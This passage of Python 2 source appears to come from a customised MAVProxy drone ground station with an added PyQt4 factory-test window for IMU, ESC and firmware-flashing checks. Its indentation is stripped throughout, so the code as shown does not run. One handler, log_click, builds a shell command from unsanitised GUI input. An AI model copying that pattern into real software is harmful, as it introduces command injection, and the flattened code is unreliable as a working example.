if cmd == 'exit' and mpstate.settings.requireexit:
mpstate.status.exit = True
return
if not cmd in command_map:
for (m,pm) in mpstate.modules:
if hasattr(m, 'unknown_command'):
try:
if m.unknown_command(args):
return
except Exception as e:
print("ERROR in command: %s" % str(e))
print("Unknown command '%s'" % line)
return
(fn, help) = command_map[cmd]
try:
fn(args[1:])
except Exception as e:
print("ERROR in command %s: %s" % (args[1:], str(e)))
if mpstate.settings.moddebug > 1:
traceback.print_exc()
def process_master(m):
'''process packets from the MAVLink master'''
try:
s = m.recv(16*1024)
except Exception:
time.sleep(0.1)
return
# prevent a dead serial port from causing the CPU to spin. The user hitting enter will
# cause it to try and reconnect
if len(s) == 0:
time.sleep(0.1)
return
if (mpstate.settings.compdebug & 1) != 0:
return
if mpstate.logqueue_raw:
mpstate.logqueue_raw.put(str(s))
if mpstate.status.setup_mode:
if mpstate.system == 'Windows':
# strip nsh ansi codes
s = s.replace("\033[K","")
sys.stdout.write(str(s))
sys.stdout.flush()
return
if m.first_byte and opts.auto_protocol:
m.auto_mavlink_version(s)
msgs = m.mav.parse_buffer(s)
#print msgs
if msgs:
for msg in msgs:
sysid = msg.get_srcSystem()
if sysid in mpstate.sysid_outputs:
# the message has been handled by a specialised handler for this system
continue
if getattr(m, '_timestamp', None) is None:
m.post_message(msg)
if msg.get_type() == "BAD_DATA":
if opts.show_errors:
mpstate.console.writeln("MAV error: %s" % msg)
mpstate.status.mav_error += 1
def process_mavlink(slave):
'''process packets from MAVLink slaves, forwarding to the master'''
try:
buf = slave.recv()
except socket.error:
return
try:
if slave.first_byte and opts.auto_protocol:
slave.auto_mavlink_version(buf)
msgs = slave.mav.parse_buffer(buf)
except mavutil.mavlink.MAVError as e:
mpstate.console.error("Bad MAVLink slave message from %s: %s" % (slave.address, e.message))
return
if msgs is None:
return
if mpstate.settings.mavfwd and not mpstate.status.setup_mode:
for m in msgs:
if mpstate.status.watch is not None:
if fnmatch.fnmatch(m.get_type().upper(), mpstate.status.watch.upper()):
mpstate.console.writeln('> '+ str(m))
mpstate.master().write(m.get_msgbuf())
mpstate.status.counters['Slave'] += 1
def mkdir_p(dir):
'''like mkdir -p'''
if not dir:
return
if dir.endswith("/"):
mkdir_p(dir[:-1])
return
if os.path.isdir(dir):
return
mkdir_p(os.path.dirname(dir))
os.mkdir(dir)
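# Illustrative usage (the path is a placeholder): creates nested directories like
# the shell's mkdir -p, silently skipping components that already exist.
def _demo_mkdir_p():
    mkdir_p('logs/2020-01-01/flight1')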
def log_writer():
'''log writing thread'''
while True:
mpstate.logfile_raw.write(mpstate.logqueue_raw.get())
while not mpstate.logqueue_raw.empty():
mpstate.logfile_raw.write(mpstate.logqueue_raw.get())
while not mpstate.logqueue.empty():
mpstate.logfile.write(mpstate.logqueue.get())
if mpstate.settings.flushlogs:
mpstate.logfile.flush()
mpstate.logfile_raw.flush()
# If state_basedir is NOT set then paths for logs and aircraft
# directories are relative to mavproxy's cwd
def log_paths():
'''Returns tuple (logdir, telemetry_log_filepath, raw_telemetry_log_filepath)'''
if opts.aircraft is not None:
if opts.mission is not None:
print(opts.mission)
dirname = "%s/logs/%s/Mission%s" % (opts.aircraft, time.strftime("%Y-%m-%d"), opts.mission)
else:
dirname = "%s/logs/%s" % (opts.aircraft, time.strftime("%Y-%m-%d"))
# dirname is currently relative. Possibly add state_basedir:
if mpstate.settings.state_basedir is not None:
dirname = os.path.join(mpstate.settings.state_basedir,dirname)
mkdir_p(dirname)
highest = None
for i in range(1, 10000):
fdir = os.path.join(dirname, 'flight%u' % i)
if not os.path.exists(fdir):
break
highest = fdir
if mpstate.continue_mode and highest is not None:
fdir = highest
elif os.path.exists(fdir):
print("Flight logs full")
sys.exit(1)
logname = 'flight.tlog'
logdir = fdir
else:
logname = os.path.basename(opts.logfile)
dir_path = os.path.dirname(opts.logfile)
if not os.path.isabs(dir_path) and mpstate.settings.state_basedir is not None:
dir_path = os.path.join(mpstate.settings.state_basedir,dir_path)
logdir = dir_path
mkdir_p(logdir)
return (logdir,
os.path.join(logdir, logname),
os.path.join(logdir, logname + '.raw'))
def open_telemetry_logs(logpath_telem, logpath_telem_raw):
'''open log files'''
if opts.append_log or opts.continue_mode:
mode = 'a'
else:
mode = 'w'
mpstate.logfile = open(logpath_telem, mode=mode)
mpstate.logfile_raw = open(logpath_telem_raw, mode=mode)
print("Log Directory: %s" % mpstate.status.logdir)
print("Telemetry log: %s" % logpath_telem)
# use a separate thread for writing to the logfile to prevent
# delays during disk writes (important as delays can be long if camera
# app is running)
t = threading.Thread(target=log_writer, name='log_writer')
t.daemon = True
t.start()
def set_stream_rates():
'''set mavlink stream rates'''
if (not msg_period.trigger() and
mpstate.status.last_streamrate1 == mpstate.settings.streamrate and
mpstate.status.last_streamrate2 == mpstate.settings.streamrate2):
return
mpstate.status.last_streamrate1 = mpstate.settings.streamrate
mpstate.status.last_streamrate2 = mpstate.settings.streamrate2
for master in mpstate.mav_master:
if master.linknum == 0:
rate = mpstate.settings.streamrate
else:
rate = mpstate.settings.streamrate2
if rate != -1:
master.mav.request_data_stream_send(mpstate.settings.target_system, mpstate.settings.target_component,
mavutil.mavlink.MAV_DATA_STREAM_ALL,
rate, 1)
def check_link_status():
'''check status of master links'''
tnow = time.time()
if mpstate.status.last_message != 0 and tnow > mpstate.status.last_message + 5:
say("no link")
mpstate.status.heartbeat_error = True
for master in mpstate.mav_master:
if not master.linkerror and (tnow > master.last_message + 5 or master.portdead):
say("link %u down" % (master.linknum+1))
master.linkerror = True
def send_heartbeat(master):
if master.mavlink10():
master.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_GCS, mavutil.mavlink.MAV_AUTOPILOT_INVALID,
0, 0, 0)
else:
MAV_GROUND = 5
MAV_AUTOPILOT_NONE = 4
master.mav.heartbeat_send(MAV_GROUND, MAV_AUTOPILOT_NONE)
def periodic_tasks():
'''run periodic checks'''
if mpstate.status.setup_mode:
return
if (mpstate.settings.compdebug & 2) != 0:
return
if mpstate.settings.heartbeat != 0:
heartbeat_period.frequency = mpstate.settings.heartbeat
if heartbeat_period.trigger() and mpstate.settings.heartbeat != 0:
mpstate.status.counters['MasterOut'] += 1
for master in mpstate.mav_master:
send_heartbeat(master)
if heartbeat_check_period.trigger():
check_link_status()
set_stream_rates()
# call optional module idle tasks. These are called at several hundred Hz
for (m,pm) in mpstate.modules:
if hasattr(m, 'idle_task'):
try:
m.idle_task()
except Exception as msg:
if mpstate.settings.moddebug == 1:
print(msg)
elif mpstate.settings.moddebug > 1:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
# also see if the module should be unloaded:
if m.needs_unloading:
unload_module(m.name)
def main_loop():
'''main processing loop'''
if not mpstate.status.setup_mode and not opts.nowait:
for master in mpstate.mav_master:
send_heartbeat(master)
if master.linknum == 0:
print("Waiting for heartbeat from %s" % master.address)
#master.wait_heartbeat()
set_stream_rates()
while True:
if mpstate is None or mpstate.status.exit:
return
while not mpstate.input_queue.empty():
line = mpstate.input_queue.get()
mpstate.input_count += 1
cmds = line.split(';')
if len(cmds) == 1 and cmds[0] == "":
mpstate.empty_input_count += 1
for c in cmds:
process_stdin(c)
for master in mpstate.mav_master:
#print master
if master.fd is None:
if master.port.inWaiting() > 0:
process_master(master)
periodic_tasks()
rin = []
for master in mpstate.mav_master:
#print master
if master.fd is not None and not master.portdead:
rin.append(master.fd)
for m in mpstate.mav_outputs:
rin.append(m.fd)
#print m
for sysid in mpstate.sysid_outputs:
m = mpstate.sysid_outputs[sysid]
rin.append(m.fd)
if rin == []:
time.sleep(0.0001)
continue
for fd in mpstate.select_extra:
rin.append(fd)
try:
(rin, win, xin) = select.select(rin, [], [], mpstate.settings.select_timeout)
except select.error:
continue
if mpstate is None:
return
for fd in rin:
if mpstate is None:
return
for master in mpstate.mav_master:
if fd == master.fd:
process_master(master)
if mpstate is None:
return
continue
for m in mpstate.mav_outputs:
if fd == m.fd:
process_mavlink(m)
if mpstate is None:
return
continue
for sysid in mpstate.sysid_outputs:
m = mpstate.sysid_outputs[sysid]
if fd == m.fd:
process_mavlink(m)
if mpstate is None:
return
continue
# this allow modules to register their own file descriptors
# for the main select loop
if fd in mpstate.select_extra:
try:
# call the registered read function
(fn, args) = mpstate.select_extra[fd]
fn(args)
except Exception as msg:
if mpstate.settings.moddebug == 1:
print(msg)
# on an exception, remove it from the select list
mpstate.select_extra.pop(fd)
def input_loop():
'''wait for user input'''
while not mpstate.status.exit:
try:
line = raw_input(mpstate.rl.prompt)
except EOFError:
mpstate.status.exit = True
sys.exit(1)
if line == "exit":
mpstate.status.exit = True
continue
if line == "burn":
#print "get stick"
burnshow.show()
continue
if line == "stick":
print "get stick"
#myshow.show()
continue
if line == "unstick":
print "delete stick"
#myshow.close()
continue
mpstate.input_queue.put(line)
def run_script(scriptfile):
'''run a script file'''
try:
f = open(scriptfile, mode='r')
except Exception:
return
mpstate.console.writeln("Running script %s" % scriptfile)
for line in f:
line = line.strip()
if line == "" or line.startswith('#'):
continue
if line.startswith('@'):
line = line[1:]
else:
mpstate.console.writeln("-> %s" % line)
process_stdin(line)
f.close()
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser("mavproxy.py [options]")
parser.add_option("--master", dest="master", action='append',
metavar="DEVICE[,BAUD]", help="MAVLink master port and optional baud rate",
default=[])
parser.add_option("--out", dest="output", action='append',
metavar="DEVICE[,BAUD]", help="MAVLink output port and optional baud rate",
default=[])
parser.add_option("--baudrate", dest="baudrate", type='int',
help="default serial baud rate", default=57600)
parser.add_option("--sitl", dest="sitl", default=None, help="SITL output port")
parser.add_option("--streamrate",dest="streamrate", default=4, type='int',
help="MAVLink stream rate")
parser.add_option("--source-system", dest='SOURCE_SYSTEM', type='int',
default=255, help='MAVLink source system for this GCS')
parser.add_option("--source-component", dest='SOURCE_COMPONENT', type='int',
default=0, help='MAVLink source component for this GCS')
parser.add_option("--target-system", dest='TARGET_SYSTEM', type='int',
default=0, help='MAVLink target master system')
parser.add_option("--target-component", dest='TARGET_COMPONENT', type='int',
default=0, help='MAVLink target master component')
parser.add_option("--logfile", dest="logfile", help="MAVLink master logfile",
default='mav.tlog')
parser.add_option("-a", "--append-log", dest="append_log", help="Append to log files",
action='store_true', default=False)
parser.add_option("--quadcopter", dest="quadcopter", help="use quadcopter controls",
action='store_true', default=False)
parser.add_option("--setup", dest="setup", help="start in setup mode",
action='store_true', default=False)
parser.add_option("--nodtr", dest="nodtr", help="disable DTR drop on close",
action='store_true', default=False)
parser.add_option("--show-errors", dest="show_errors", help="show MAVLink error packets",
action='store_true', default=False)
parser.add_option("--speech", dest="speech", help="use text to speach",
action='store_true', default=False)
parser.add_option("--aircraft", dest="aircraft", help="aircraft name", default=None)
parser.add_option("--cmd", dest="cmd", help="initial commands", default=None, action='append')
parser.add_option("--console", action='store_true', help="use GUI console")
parser.add_option("--map", action='store_true', help="load map module")
parser.add_option("--hardware", action='store_true', help="load hardware module")
parser.add_option(
'--load-module',
action='append',
default=[],
help='Load the specified module. Can be used multiple times, or with a comma separated list')
parser.add_option("--mav09", action='store_true', default=False, help="Use MAVLink protocol 0.9")
parser.add_option("--mav20", action='store_true', default=False, help="Use MAVLink protocol 2.0")
parser.add_option("--auto-protocol", action='store_true', default=False, help="Auto detect MAVLink protocol version")
parser.add_option("--nowait", action='store_true', default=False, help="don't wait for HEARTBEAT on startup")
parser.add_option("-c", "--continue", dest='continue_mode', action='store_true', default=False, help="continue logs")
#parser.add_option("--dialect", default="ardupilotmega", help="MAVLink dialect")
parser.add_option("--dialect", default="brisky", help="MAVLink dialect")
parser.add_option("--rtscts", action='store_true', help="enable hardware RTS/CTS flow control")
parser.add_option("--moddebug", type=int, help="module debug level", default=0)
parser.add_option("--mission", dest="mission", help="mission name", default=None)
parser.add_option("--daemon", action='store_true', help="run in daemon mode, do not start interactive shell")
parser.add_option("--profile", action='store_true', help="run the Yappi python profiler")
parser.add_option("--state-basedir", default=None, help="base directory for logs and aircraft directories")
parser.add_option("--version", action='store_true', help="version information")
#parser.add_option("--default-modules", default="log,signing,wp,rally,fence,param,relay,tuneopt,arm,mode,calibration,rc,auxopt,misc,cmdlong,battery,terrain,output,adsb", help='default module list')
parser.add_option("--default-modules", default="dataflash_logger,airbeetest,log,signing,rally,fence,param,relay,tuneopt,arm,mode,calibration,rc,auxopt,misc,cmdlong,battery,terrain,output,adsb", help='default module list')
(opts, args) = parser.parse_args()
# warn people about ModemManager which interferes badly with APM and Pixhawk
if os.path.exists("/usr/sbin/ModemManager"):
print("WARNING: You should uninstall ModemManager as it conflicts with APM and Pixhawk")
if opts.mav09:
os.environ['MAVLINK09'] = '1'
if opts.mav20:
os.environ['MAVLINK20'] = '1'
from pymavlink import mavutil, mavparm
mavutil.set_dialect(opts.dialect)
#version information
if opts.version:
import pkg_resources
version = pkg_resources.require("mavproxy")[0].version
print ("MAVProxy is a modular ground station using the mavlink protocol")
print ("MAVProxy Version: " + version)
sys.exit(1)
# global mavproxy state
mpstate = MPState()
mpstate.status.exit = False
mpstate.command_map = command_map
mpstate.continue_mode = opts.continue_mode
# queues for logging
mpstate.logqueue = Queue.Queue()
mpstate.logqueue_raw = Queue.Queue()
mpstate.uiqueue = Queue.Queue()
if opts.speech:
# start the speech-dispatcher early, so it doesn't inherit any ports from
# modules/mavutil
load_module('speech')
if not opts.master:
serial_list = mavutil.auto_detect_serial(preferred_list=['*FTDI*',"*Arduino_Mega_2560*", "*3D_Robotics*", "*USB_to_UART*", '*PX4*', '*FMU*'])
print('Auto-detected serial ports are:')
for port in serial_list:
print("%s" % port)
# container for status information
mpstate.settings.target_system = opts.TARGET_SYSTEM
mpstate.settings.target_component = opts.TARGET_COMPONENT
mpstate.mav_master = []
mpstate.rl = rline.rline("MAV> ", mpstate)
def quit_handler(signum = None, frame = None):
#print 'Signal handler called with signal', signum
if mpstate.status.exit:
print ('Clean shutdown impossible, forcing an exit')
sys.exit(0)
else:
mpstate.status.exit = True
# Listen for kill signals to cleanly shutdown modules
fatalsignals = [signal.SIGTERM]
try:
fatalsignals.append(signal.SIGHUP)
fatalsignals.append(signal.SIGQUIT)
except Exception:
pass
if opts.daemon: # SIGINT breaks readline parsing - if we are interactive, just let things die
fatalsignals.append(signal.SIGINT)
for sig in fatalsignals:
signal.signal(sig, quit_handler)
load_module('link', quiet=True)
mpstate.settings.source_system = opts.SOURCE_SYSTEM
mpstate.settings.source_component = opts.SOURCE_COMPONENT
# open master link
for mdev in opts.master:
if not mpstate.module('link').link_add(mdev):
sys.exit(1)
if not opts.master and len(serial_list) == 1:
print("Connecting to %s" % serial_list[0])
mpstate.module('link').link_add(serial_list[0].device)
elif not opts.master:
#wifi_device = '0.0.0.0:14550'
wifi_device = 'udp:0.0.0.0:14550'
#wifi_device = 'tcp:192.168.1.1:10000'
mpstate.module('link').link_add(wifi_device)
# open any mavlink output ports
for port in opts.output:
mpstate.mav_outputs.append(mavutil.mavlink_connection(port, baud=int(opts.baudrate), input=False))
if opts.sitl:
mpstate.sitl_output = mavutil.mavudp(opts.sitl, input=False)
mpstate.settings.streamrate = opts.streamrate
mpstate.settings.streamrate2 = opts.streamrate
if opts.state_basedir is not None:
mpstate.settings.state_basedir = opts.state_basedir
msg_period = mavutil.periodic_event(1.0/15)
heartbeat_period = mavutil.periodic_event(1)
heartbeat_check_period = mavutil.periodic_event(0.33)
mpstate.input_queue = Queue.Queue()
mpstate.input_count = 0
mpstate.empty_input_count = 0
if opts.setup:
mpstate.rl.set_prompt("")
# call this early so that logdir is setup based on --aircraft
(mpstate.status.logdir, logpath_telem, logpath_telem_raw) = log_paths()
if not opts.setup:
# some core functionality is in modules
standard_modules = opts.default_modules.split(',')
for m in standard_modules:
load_module(m, quiet=True)
if opts.console:
process_stdin('module load console')
if opts.map:
process_stdin('module load map')
for module in opts.load_module:
modlist = module.split(',')
for mod in modlist:
process_stdin('module load %s' % mod)
if 'HOME' in os.environ and not opts.setup:
start_script = os.path.join(os.environ['HOME'], ".mavinit.scr")
if os.path.exists(start_script):
run_script(start_script)
if 'LOCALAPPDATA' in os.environ and not opts.setup:
start_script = os.path.join(os.environ['LOCALAPPDATA'], "MAVProxy", "mavinit.scr")
if os.path.exists(start_script):
run_script(start_script)
if opts.aircraft is not None:
start_script = os.path.join(opts.aircraft, "mavinit.scr")
if os.path.exists(start_script):
run_script(start_script)
else:
print("no script %s" % start_script)
if opts.cmd is not None:
for cstr in opts.cmd:
cmds = cstr.split(';')
for c in cmds:
process_stdin(c)
if opts.profile:
import yappi # We do the import here so that we won't barf if run normally and yappi not available
yappi.start()
# log all packets from the master, for later replay
open_telemetry_logs(logpath_telem, logpath_telem_raw)
# run main loop as a thread
mpstate.status.thread = threading.Thread(target=main_loop, name='main_loop')
mpstate.status.thread.daemon = True
mpstate.status.thread.start()
# --- UI test code (PyQt4) ---
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import QFileDialog,QHBoxLayout,QPalette
from test2 import Ui_MainWindow
from burn import Ui_MainWindow_burn
from PyQt4.QtCore import QDir
import platform
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import animation
import numpy as np
from matplotlib import pyplot as plt
import random
class WorkThread(QtCore.QThread):
"""workthread to avoid the wt hang"""
def __init__(self, _func):
super(WorkThread, self).__init__()
self._func = _func
def run(self):
process_stdin(self._func)
class UIThread(QtCore.QThread):
"""workthread to add the ui"""
finishSignal = QtCore.pyqtSignal(str)
imu_Signal = QtCore.pyqtSignal(dict)
def __init__(self):
super(UIThread, self).__init__()
def run(self):
while not mpstate.status.exit:
#time.sleep(0.1)
try:
if mpstate.status.exit:
break
_log = mpstate.uiqueue.get()
if isinstance(_log, dict):
self.imu_Signal.emit(_log)
else:
self.finishSignal.emit(_log)
except KeyboardInterrupt:
break
#self.textEdit.setPlainText(str(_log))
#def __del__(self):
# self.wait()
class BurnWindow(QtGui.QMainWindow,Ui_MainWindow_burn):
def __init__(self):
super(BurnWindow,self).__init__()
self.setupUi(self)
self._dis = [0 for i in range(100)]
self._dis_max = 5
self._dis_min = 0
self.x_acc_list = []
self.y_acc_list = []
self.z_acc_list = []
self.x_gyro_list = []
self.y_gyro_list = []
self.z_gyro_list = []
self.x_mag_list = []
self.y_mag_list = []
self.z_mag_list = []
self.distance_list = [0 for i in range(20)]
self.abs_pressure_list = [0 for i in range(20)]
self.test_num = 500
self.test_num_ui = 200
self.x_acc_log = []
self.y_acc_log = []
self.z_acc_log = []
self.x_gyro_log = []
self.y_gyro_log = []
self.z_gyro_log = []
self.x_mag_log = []
self.y_mag_log = []
self.z_mag_log = []
self.distance_log = []
self.abs_pressure_log = []
self.temp_log = []
self.temp = 0
self.imu_test_tag = 0
self._createFigures()
self._createLayouts()
self.pe = QPalette()
self.pe.setColor(QPalette.WindowText,QtCore.Qt.red)
self.pe_black = QPalette()
self.pe_black.setColor(QPalette.WindowText,QtCore.Qt.black)
self._uithread = UIThread()
self._uithread.finishSignal.connect(self.write_console)
self._uithread.imu_Signal.connect(self.write_imu)
try:
self._uithread.start()
except KeyboardInterrupt:
print "exit!!!"
#self._uithread.setDaemon(True)
def _createFigures(self):
#self._fig = Figure(figsize=(80, 60), dpi=100, tight_layout=True)
#self._fig = Figure()
self._fig = plt.figure()
#self._fig.set_facecolor("#F5F5F5") # background color
#self._fig.subplots_adjust(left=0.08, top=0.92, right=0.95, bottom=0.1)
self._canvas = FigureCanvas(self._fig) # the Matplotlib canvas widget
self._ax = self._fig.add_subplot(111) # add a subplot
#self._ax = plt.axes(xlim=(0, 2), ylim=(-2, 2))
#self._ax.hold(True)
self._initializeFigure()
def _initializeFigure(self):
#Font = {'family': 'Tahoma',
# 'weight': 'bold',
# 'size': 10}
# Abscissa
#self._ax.set_xlim([380, 780])
#self._ax.set_xticks([380, 460, 540, 620, 700, 780])
#self._ax.set_xticklabels([380, 460, 540, 620, 700, 780], fontdict=Font)
self._ax.set_xlabel("time")
# Ordinate
#self._ax.set_ylim([0.0, 1.0])
#self._ax.set_yticks(np.arange(0.0, 1.1, 0.2))
#self._ax.set_yticklabels(np.arange(0.0, 1.1, 0.2), fontdict=Font)
self._ax.set_ylabel("value")
self._ax.grid(True)
self.line, = self._ax.plot(self._dis)
def _createLayouts(self):
layout = QHBoxLayout(self.frame)
#layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._canvas) # Add Matplotli
def _init(self):
self.line.set_data([], []) # set_data takes separate x and y sequences
return self.line,
def imu_test(self):
#process_stdin("imu_test")
process_stdin("wifi")
#sys.path.append("/home/user/git/test_tool/MAVProxy-master/MAVProxy/modules")
#print sys.path
#import mavproxy_airbeetest
#self.airbee_test = mavproxy_airbeetest.AirbeetestModule(mpstate)
if self.imu_test_tag == 0:
self.imu_to_excel()
self.imu_test_tag = 1
else:
self.save_imu_to_excel()
self.imu_test_tag = 0
def ESC_test(self):
process_stdin("arm throttle")
time.sleep(2)
process_stdin("disarm")
def boot_time(self):
process_stdin("pressure 1")
def connect(self):
process_stdin("link add udp:0.0.0.0:14550")
def disconnect(self):
process_stdin("link remove 0")
def animate(self, i):
self._ax.set_ylim([self._dis_min, self._dis_max])
self.line.set_ydata(i)
return self.line,
def data_gen(self):
while True:
#self._dis = self._dis[1:]+self._dis
#print self._dis
yield(self._dis)
def on_radioButton_clicked(self):
self._anim = animation.FuncAnimation(self._fig, self.animate, self.data_gen, interval=100) # keep a reference so the animation is not garbage-collected
#init_func=self._init,
self._canvas.draw()
#self._ax.clear()
if self.radioButton_dis.isChecked():
pass
def versions(self):
process_stdin("versions")
def wifi(self):
#print ('start bsp burn')
process_stdin("wifi")
def check_log(self):
#print ('start bsp burn')
process_stdin("check_log")
def app_version(self):
#print ('start bsp burn')
process_stdin("app_version")
def bsp(self):
#print ('start bsp burn')
self._bsp = WorkThread("bsp")
self._bsp.start()
#process_stdin('bsp')
def airbee(self):
#print ('start airbee burn')
self._airbee = WorkThread("airbee")
self._airbee.start()
#self.textEdit.setPlainText("bbbb")
#process_stdin('airbee')
def bsp_click(self):
if platform.system() == "Linux":
bsp_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'/home/jenkins/release/bsp',"txt files (*.sh)")
if platform.system() == "Windows":
bsp_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'F:/tools/',"txt files (*.bat)")
if bsp_file_path:
self.bsp_dir_lineEdit.setText(bsp_file_path)
mpstate.bsp_dir,mpstate.bsp_name = os.path.split(str(bsp_file_path))
print mpstate.bsp_dir,mpstate.bsp_name
process_stdin("set_build_dir")
def app_click(self):
if platform.system() == "Linux":
app_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'/home/jenkins/release/AirBee',"txt files (*.sh)")
if platform.system() == "Windows":
app_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'F:/tools/build_tool',"txt files (*.bat)")
if app_file_path:
self.app_dir_lineEdit.setText(app_file_path)
mpstate.app_dir,mpstate.app_name = os.path.split(str(app_file_path))
print mpstate.app_dir,mpstate.app_name
process_stdin("set_build_dir")
def log_click(self):
log_dir = self.log_dir_lineEdit.text()
print log_dir
_time = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("adb pull /root/log/%s %s" % (log_dir, _time))
def param_click(self):
if platform.system() == "Linux":
param_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'/home/user/git/test_tool/MAVProxy-master',"txt files (*.parm)")
if platform.system() == "Windows":
param_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'F:/tools/build_tool',"txt files (*.parm)")
if param_file_path:
self.param_dir_lineEdit.setText(param_file_path)
#mpstate.app_dir,mpstate.app_name = os.path.split(str(app_file_path))
#print mpstate.app_dir,mpstate.app_name
#process_stdin("set_build_dir")
def param_load(self):
param_dir = self.param_dir_lineEdit.text()
print param_dir
#_time = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
process_stdin("param load %s" % param_dir)
def write_console(self,_str):
#_log = mpstate.uiqueue.get()
#print "call write console"
cursor = self.textEdit.textCursor()
cursor.insertText(_str)
self.textEdit.setTextCursor(cursor)
self.textEdit.ensureCursorVisible()
#self.textEdit.setPlainText(_str)
def judge_imu(self, _list, _label,_imu):
peak_peak = max(_list)-min(_list)
std = np.std(_list)
mean = float(sum(_list)) / len(_list) # avoid Python 2 integer division
#_label.setText("pkpk:%.6f std:%.6f" % (peak_peak,std))
_label.setText("pkpk:%.6f std:%.6f mean:%.6f" % (peak_peak,std,mean))
if _imu == "acc":
if std>0.015:
_label.setPalette(self.pe)
else:
_label.setPalette(self.pe_black)
if _imu == "gyro":
if std>0.0014:
_label.setPalette(self.pe)
else:
_label.setPalette(self.pe_black)
def judge_distance(self, _list, _label):
peak_peak = max(_list)-min(_list)
std = np.std(_list)
mean = float(sum(_list)) / len(_list) # avoid Python 2 integer division
_label.setText("pkpk:%.6f std:%.6f mean:%.6f" % (peak_peak,std,mean))
if peak_peak>5:
_label.setPalette(self.pe)
else:
_label.setPalette(self.pe_black)
def _pk_pk(self, _list, _num):
#import pdb
#pdb.set_trace()
#print _list
if _list:
peak_peak = max(_list)-min(_list)
print "num:%s pkpk:%s\n" % (_num,peak_peak)
if peak_peak == 0:
return {"fail":peak_peak}
if _num in [2,3,4]:
if peak_peak>0.5:
return {"fail":peak_peak}
elif _num in [5,6,7]:
if peak_peak>0.1:
return {"fail":peak_peak}
elif _num in [8,9,10]:
if peak_peak>0.1:
return {"fail":peak_peak}
elif _num == 0:
if peak_peak>1000:
return {"fail":peak_peak}
elif _num == 1:
if peak_peak>5:
return {"fail":peak_peak}
elif _num == 11:
if peak_peak>60:
return {"fail":peak_peak}
else:
print "wrong _num of list"
return max(_list)-min(_list)
else:
return 0
def _std(self, _list, _num):
if _list:
std = np.std(_list)
print "num:%s std:%s\n" % (_num, std)
if std == 0:
return {"fail":std}
if _num in [2,3,4]:
if std>0.015:
return {"fail":std}
elif _num in [5,6,7]:
if std>0.0014:
return {"fail":std}
elif _num in [8,9,10]:
if std>0.01:
return {"fail":std}
elif _num == 0:
if std>10000:
return {"fail":std}
elif _num == 1:
if std>10000:
return {"fail":std}
elif _num == 11:
pass
else:
print "wrong _num of list"
return np.std(_list)
else:
return 0
def _mean(self, _list, _num):
if _list:
return float(sum(_list)) / len(_list) # avoid Python 2 integer division
else:
return 0
def imu_to_excel(self):
self.label_imutest.setText("testing")
self.pushButton_imutest.setText("stop")
#current_path = self.getcwd()
sys.path.append("%s/MAVProxy/modules" % os.getcwd())
print sys.path
import mavproxy_airbeetest
self.airbee_test = mavproxy_airbeetest.AirbeetestModule(mpstate)
self.airbee_test.creat_excel("imu_test.xls")
_time = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
#print "=============",mpstate.ssid,"================="
#sheet_name = "%s_%s" % (_time, mpstate.ssid[-3:])
print "=============",mpstate.mac,"================="
#sheet_name = "%s_%s" % (_time, mpstate.mac)
self.sheet_name = "%s_%s" % ("Daybreaker2", mpstate.mac)
self.airbee_test.creat_sheet(self.sheet_name)
column_0 = ["name","abs_pressure","current_distance","xacc","yacc","zacc","xgyro","ygyro","zgyro","xmag","ymag","zmag","temprature","test_result"]
column_all = ["name","mac","test_item","abs_pressure","current_distance","xacc","yacc","zacc","xgyro","ygyro","zgyro","xmag","ymag","zmag","temprature","test_result"]
#time.sleep(5)
#print self.distance_log
self.airbee_test.creat_sheet_header(column_0)
self.airbee_test.creat_sheet_all_header(column_all)
def math_clume_list(self, func, _list):
math_list = [func(_list[i],i) for i in range(len(_list))]
return math_list
def save_imu_to_excel(self):
# pad the distance log with zeros if it has fewer than self.test_num samples,
# so the distance data length matches the IMU logs
colume_raw = [self.abs_pressure_log, self.distance_log, self.x_acc_log, self.y_acc_log,
self.z_acc_log, self.x_gyro_log, self.y_gyro_log, self.z_gyro_log,
self.x_mag_log, self.y_mag_log, self.z_mag_log, self.temp_log]
if len(colume_raw[1])<self.test_num:
colume_raw[1] = colume_raw[1] + [0 for i in range(self.test_num-len(colume_raw[1]))]
colume_pkpk = ["PKPK"]+self.math_clume_list(self._pk_pk,colume_raw)
colume_std = ["STD"]+self.math_clume_list(self._std,colume_raw)
colume_mean = ["Mean"]+self.math_clume_list(self._mean,colume_raw)
self.airbee_test.append_excel(1,colume_pkpk)
self.airbee_test.append_excel(2,colume_std)
self.airbee_test.append_excel(3,colume_mean)
#new
self.airbee_test.append_excel_all_result([self.sheet_name]+colume_std)
for i in range(self.test_num):
colume_line = [j[i] for j in colume_raw]
#print colume_line
self.airbee_test.append_excel(i+5,[str(i)]+ colume_line)
self.airbee_test.save_excel()
self.label_imutest.setText("complete")
self.label_distest.setText("complete")
self.pushButton_imutest.setText("imu test")
#reset the imu log
self.x_acc_log = []
self.y_acc_log = []
self.z_acc_log = []
self.x_gyro_log = []
self.y_gyro_log = []
self.z_gyro_log = []
self.x_mag_log = []
self.y_mag_log = []
self.z_mag_log = []
self.distance_log = []
self.abs_pressure_log = []
self.temp_log = []
self.temp = 0
#print self.distance_log
def _get_log(self, _list, _str, _item):
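# Accumulate up to self.test_num samples of one telemetry field; once full,
# keep a sliding window of the most recent values and update the status label.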
if self.imu_test_tag == 0:
return 0
if len(_list)<self.test_num:
_list.append(float(_str[_item]))
self.label_distest.setText(str(len(_list)))
else:
_list[:] = _list[1:]+[float(_str[_item])]
self.label_imutest.setPalette(self.pe)
self.label_distest.setText("get imu")
def _get_log_dis(self, _list, _str, _item):
if self.imu_test_tag == 0:
return 0
if len(_list)<self.test_num:
_list.append(float(_str[_item]))
self.label_imutest.setText(str(len(_list)))
else:
_list[:] = _list[1:]+[float(_str[_item])]
